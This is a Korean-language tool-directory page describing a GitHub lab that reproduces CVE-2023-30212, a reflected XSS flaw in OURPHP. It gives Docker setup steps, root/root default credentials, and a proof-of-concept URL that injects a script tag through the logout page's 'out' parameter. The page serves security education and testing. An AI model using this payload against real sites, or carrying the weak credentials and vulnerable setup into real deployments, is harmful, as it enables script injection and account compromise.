Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-30212 — 반사형 XSS 취약점인 CVE-2023-30212를 재현하기 위한 Docker 기반 취약한 OURPHP 랩으로, 설정 지침과 개념 증명 악용 URL을 포함합니다. | Kitploit
도구/GitHubGitHub/aash035/cve-2023-30212
Container SecurityVulnerability AnalysisWeb Application ExploitationLearning & EducationLabs & Practice
GitHubaash035/cve-2023-30212

CVE-2023-30212

반사형 XSS 취약점인 CVE-2023-30212를 재현하기 위한 Docker 기반 취약한 OURPHP 랩으로, 설정 지침과 개념 증명 악용 URL을 포함합니다.

저장소 보기
133년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-30212 실습 환경 설정

사전 요구사항
docker.io 다운로드
sudo apt install -y docker.io


단계
  1. 아래 명령어를 사용하여 내 저장소에서 모든 파일을 다운로드하세요.
    git clone https://github.com/AAsh035/CVE-2023-30212.git

  2. 이제 Docker 이미지를 만들기 위해 다음 명령어를 실행하세요:
    sudo docker build -t vuln .

  3. 다음은 Docker 이미지를 컨테이너로 전환합니다. 컨테이너는 포트 80에서 실행되어야 합니다. 명령어는 다음과 같습니다:
    sudo docker run -d -p 80:80 vuln

  4. 컨테이너가 실행 중인지 확인하려면 다음 명령어를 사용하세요:
    sudo docker ps

  5. 브라우저에 127.0.0.1을 입력하면 OURPHP 페이지가 로드됩니다.

  6. 다음과 같이 ourphp를 구성해야 합니다:
    사용자 이름 : root
    비밀번호 : root
    데이터베이스 이름: vuln

  7. 이제 관리자용 사용자 이름과 비밀번호를 구성해야 합니다. 다음과 같이 설정하세요:
    사용자 이름: root
    비밀번호: root

  8. 이제 아래 링크를 복사하여 브라우저에 붙여넣으세요:
    http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>

https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0

도구 다운로드